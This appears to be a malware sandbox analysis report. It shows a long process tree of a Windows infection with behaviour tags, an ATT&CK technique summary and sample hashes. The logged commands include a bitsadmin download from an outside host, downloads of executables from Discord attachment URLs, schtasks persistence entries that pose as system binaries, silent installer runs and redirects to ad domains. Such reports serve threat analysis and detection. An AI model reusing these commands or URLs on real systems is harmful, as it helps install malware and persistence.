C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw59B8.tmp\tempfile.ps1"5⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z5⤵
- Download via BitsAdmin
-
C:\Users\Admin\Pictures\Adobe Films\aDpjh1ksoewfrV4qxYgfCwyx.exe"C:\Users\Admin\Pictures\Adobe Films\aDpjh1ksoewfrV4qxYgfCwyx.exe"1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3948 -ip 39481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 6732 -ip 67321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 3384 -ip 33841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6732 -s 2041⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 6708 -ip 67081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 5740 -ip 57401⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A8E8.tmp\A8E9.tmp\A8EA.bat "C:\Users\Admin\Pictures\Adobe Films\lDmYLXyNa7LPLO_m9F0WRNSp.exe""1⤵
-
C:\Users\Admin\AppData\Local\Temp\A8E8.tmp\A8E9.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\A8E8.tmp\A8E9.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/901113291861028926/901113305991643206/18.exe" "18.exe" "" "" "" "" "" ""2⤵
-
C:\Users\Admin\AppData\Local\Temp\A8E8.tmp\A8E9.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\A8E8.tmp\A8E9.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/901113291861028926/901113363139035156/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""2⤵
-
C:\Users\Admin\AppData\Local\Temp\A8E8.tmp\A8E9.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\A8E8.tmp\A8E9.tmp\extd.exe "" "" "" "" "" "" "" "" ""2⤵
-
C:\Users\Admin\AppData\Local\Temp\29765\Transmissibility.exeTransmissibility.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\29765\18.exe18.exe2⤵
-
C:\Users\Admin\Pictures\Adobe Films\jTpJDXJu0rO2dvjCK2d8f8y3.exe"C:\Users\Admin\Pictures\Adobe Films\jTpJDXJu0rO2dvjCK2d8f8y3.exe"1⤵
-
C:\Users\Admin\Pictures\Adobe Films\vZtRm6RPNwcqvnanVev4uQep.exe"C:\Users\Admin\Pictures\Adobe Films\vZtRm6RPNwcqvnanVev4uQep.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4208 -ip 42081⤵
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"1⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Local\Temp\84B1.exeC:\Users\Admin\AppData\Local\Temp\84B1.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\84B1.exeC:\Users\Admin\AppData\Local\Temp\84B1.exe2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 3060 -ip 30601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 7248 -ip 72481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1332 -ip 13321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Users\Admin\AppData\Local\Temp\is-67GKE.tmp\Gy4Fi8em_KLp3z6GEiMCww2A.tmp"C:\Users\Admin\AppData\Local\Temp\is-67GKE.tmp\Gy4Fi8em_KLp3z6GEiMCww2A.tmp" /SL5="$303EA,506127,422400,C:\Users\Admin\Pictures\Adobe Films\Gy4Fi8em_KLp3z6GEiMCww2A.exe"1⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-KOM9D.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-KOM9D.tmp\DYbALA.exe" /S /UID=27092⤵
- Drops file in Drivers directory
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\WYRKBQWKUB\foldershare.exe"C:\Users\Admin\AppData\Local\Temp\WYRKBQWKUB\foldershare.exe" /VERYSILENT3⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\91-e9c59-dad-64ea1-4dd2c9217edf3\Pebaefaewexae.exe"C:\Users\Admin\AppData\Local\Temp\91-e9c59-dad-64ea1-4dd2c9217edf3\Pebaefaewexae.exe"3⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e64⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcd08e46f8,0x7ffcd08e4708,0x7ffcd08e47185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcd08e46f8,0x7ffcd08e4708,0x7ffcd08e47185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514834⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcd08e46f8,0x7ffcd08e4708,0x7ffcd08e47185⤵
-
C:\Users\Admin\AppData\Local\Temp\ed-ce543-d59-5abb5-287644db3efbd\Taejofutupa.exe"C:\Users\Admin\AppData\Local\Temp\ed-ce543-d59-5abb5-287644db3efbd\Taejofutupa.exe"3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ipoiyo3v.ln2\GcleanerEU.exe /eufive & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\ipoiyo3v.ln2\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\ipoiyo3v.ln2\GcleanerEU.exe /eufive5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 19192 -s 2526⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\apa1enly.hvk\installer.exe /qn CAMPAIGN="654" & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\apa1enly.hvk\installer.exeC:\Users\Admin\AppData\Local\Temp\apa1enly.hvk\installer.exe /qn CAMPAIGN="654"5⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\apa1enly.hvk\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\apa1enly.hvk\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634658223 /qn CAMPAIGN=""654"" " CAMPAIGN="654"6⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\to2uro1s.scj\any.exe & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\to2uro1s.scj\any.exeC:\Users\Admin\AppData\Local\Temp\to2uro1s.scj\any.exe5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3bjt0nuv.vsu\gcleaner.exe /mixfive & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\3bjt0nuv.vsu\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\3bjt0nuv.vsu\gcleaner.exe /mixfive5⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3956 -s 2566⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xlviyttj.ksg\autosubplayer.exe /S & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\xlviyttj.ksg\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\xlviyttj.ksg\autosubplayer.exe /S5⤵
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu6304.tmp\tempfile.ps1"6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu6304.tmp\tempfile.ps1"6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu6304.tmp\tempfile.ps1"6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu6304.tmp\tempfile.ps1"6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu6304.tmp\tempfile.ps1"6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu6304.tmp\tempfile.ps1"6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu6304.tmp\tempfile.ps1"6⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z6⤵
- Download via BitsAdmin
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 7256 -ip 72561⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft OneDrive\setup\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3716 -ip 37161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Transmissibility" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\29765\18\Transmissibility.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe e58bda179b647d8612e48a6ef749c3a3 wz+93ybZOUOarTGSQyPF/Q.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "8884366" /sc ONLOGON /tr "'C:\Boot\en-US\8884366.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cutm3" /sc ONLOGON /tr "'C:\Program Files (x86)\Company\NewProduct\Uninstall\cutm3.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7120 -s 4562⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 7120 -ip 71201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "x5yjjKUdFt2OAlDQL7_fYMPj" /sc ONLOGON /tr "'C:\Users\Admin\Pictures\Adobe Films\HCXOFRiAMR5KOhUwU_ppv7b9\x5yjjKUdFt2OAlDQL7_fYMPj.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3240 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3240 -ip 32401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "8474982" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\907323\8474982.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\System32\MP4SDECD\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\PerfLogs\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sh4hflfTIu9X6CgvU_tIR6x4" /sc ONLOGON /tr "'C:\Users\Admin\Pictures\Adobe Films\lDYn6p91yzfKElN48ASYj3I8\sh4hflfTIu9X6CgvU_tIR6x4.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\7C9F.exeC:\Users\Admin\AppData\Local\Temp\7C9F.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\96DF.exeC:\Users\Admin\AppData\Local\Temp\96DF.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6436 -s 2602⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 6436 -ip 64361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\ACD9.exeC:\Users\Admin\AppData\Local\Temp\ACD9.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\173C.exeC:\Users\Admin\AppData\Local\Temp\173C.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7864 -s 3122⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 7864 -ip 78641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 19192 -ip 191921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 3956 -ip 39561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 2012 -ip 20121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2108 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 2108 -ip 21081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 5E805B8E6246B6D41638EAA78CA1C7BC C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 25B31A8AF0F96D53ED7E365B491F19D62⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 11B6E11BE74B276B813F079FE24A98B3 E Global\MSI00002⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 8828 -ip 88281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9112 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 9112 -ip 91121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 10680 -ip 106801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 12672 -ip 126721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 13592 -s 4523⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 13592 -ip 135921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
Network
MITRE ATT&CK Enterprise v6
Persistence
BITS Jobs
1Modify Existing Service
2Registry Run Keys / Startup Folder
2Scheduled Task
1Defense Evasion
BITS Jobs
1Disabling Security Tools
1Install Root Certificate
1Modify Registry
4Virtualization/Sandbox Evasion
2Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
7f5a1d94e9974c0f88e556e17a5caaea
SHA19426565e3340173c7b613495b1458f2d1935ab78
SHA256955d175aa1e860c0e71ecf6099af28db352adc1c8a2619795cfdffe3d895eeef
SHA512767489777c3e7227b3440f410542f9b7f57c9cee7db26bee4a1636f6eb7ede3ea3a262361fedcca189becf508be38233fe4309d696ee842a3ef43b018d017c84
-
MD5
a901c8ea26fc27b7738538d8fd53163f
SHA13ba67c7b67c5a61b25a62a32efdaffe57694cacd
SHA2569cd2472a0174087b147ff601b8f6044a117c890f4cf25088c6cec9d3f46c1a32
SHA5126e0be7572640ce34130e5474bfc01fdddf66bfdde79cf308e88565d6f17df6dfedd4725623a67fbfd3835d200a1c8016b2ae6ba3180b9827cd2d643e00365012
-
MD5
b4c503088928eef0e973a269f66a0dd2
SHA1eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA2562a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465
-
MD5
b4c503088928eef0e973a269f66a0dd2
SHA1eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA2562a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465
-
MD5
bad58c651d1048581f4862e6c6539417
SHA1fa36109ae30c60460ba64aad8f169dd0fa42001b
SHA256f52e1ebc1a294f9f4413a4069dd27f6926e4c64e4a0fdb21957beb3f8ec12271
SHA51296ae6a38fdb9eba90fe525a87881e80b9c920f0c6ff231b753fb0ecaa691c56380fa5331df1b9c6b391f36d78c3559686b2c65daecf1682d4738474217c46455
-
MD5
bad58c651d1048581f4862e6c6539417
SHA1fa36109ae30c60460ba64aad8f169dd0fa42001b
SHA256f52e1ebc1a294f9f4413a4069dd27f6926e4c64e4a0fdb21957beb3f8ec12271
SHA51296ae6a38fdb9eba90fe525a87881e80b9c920f0c6ff231b753fb0ecaa691c56380fa5331df1b9c6b391f36d78c3559686b2c65daecf1682d4738474217c46455
-
MD5
dec69c757ce1ae8454f97ef6966aa817
SHA1160d556701a012ab18194aeecaa396e21727c9b2
SHA2562b396ae1fa95ef655bb7b0eb45532a857d882bb601adeb8fb1b5d43dcff9ec31
SHA512c6304aa1a5b762804c81461fb1db1bae9ba57120c279dfb1ad83c3bb2e3309563f15c90a1a04a9f3acb5aac3a527432a87d1bb7ba32846dc75bda961b162db16
-
MD5
dec69c757ce1ae8454f97ef6966aa817
SHA1160d556701a012ab18194aeecaa396e21727c9b2
SHA2562b396ae1fa95ef655bb7b0eb45532a857d882bb601adeb8fb1b5d43dcff9ec31
SHA512c6304aa1a5b762804c81461fb1db1bae9ba57120c279dfb1ad83c3bb2e3309563f15c90a1a04a9f3acb5aac3a527432a87d1bb7ba32846dc75bda961b162db16
-
MD5
619aa73b97d9d55df2ab142b8a7d9ae4
SHA18e6aee5e473f278855887aeae38323e2bbb23b21
SHA2568164fcc1805d268c83bb84cfd42a21e9f85752c13c4d2033f191ed50fc8c47ed
SHA512ef488b50dc46e8f97701ae3530f0b8ba8dce60274b073b394e4c9344a63bfc852b2628b75b9267f747427ae3f8e52f1e38c00abe0b6bd700fd67eb8524cbaf58
-
MD5
619aa73b97d9d55df2ab142b8a7d9ae4
SHA18e6aee5e473f278855887aeae38323e2bbb23b21
SHA2568164fcc1805d268c83bb84cfd42a21e9f85752c13c4d2033f191ed50fc8c47ed
SHA512ef488b50dc46e8f97701ae3530f0b8ba8dce60274b073b394e4c9344a63bfc852b2628b75b9267f747427ae3f8e52f1e38c00abe0b6bd700fd67eb8524cbaf58
-
MD5
3399436f50fad870cade4f68de68a76d
SHA1a690dd92fa2902ec5881b1ed55b1bb7316f48b70
SHA2569e9519db3a55dd28cc85ddb8e02990758fa23d0f387e006de073e30277bce862
SHA512c558ca8b467e3375d9f5e5db9801ce400cd5d0ce86b53ec4fe0d2452284afb32b642d915e6c89d9ec34bda1f81a75ad19c3aced770732573a0f55bfd0de6de03
-
MD5
3399436f50fad870cade4f68de68a76d
SHA1a690dd92fa2902ec5881b1ed55b1bb7316f48b70
SHA2569e9519db3a55dd28cc85ddb8e02990758fa23d0f387e006de073e30277bce862
SHA512c558ca8b467e3375d9f5e5db9801ce400cd5d0ce86b53ec4fe0d2452284afb32b642d915e6c89d9ec34bda1f81a75ad19c3aced770732573a0f55bfd0de6de03
-
MD5
91e3bed725a8399d72b182e5e8132524
SHA10f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA25618af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
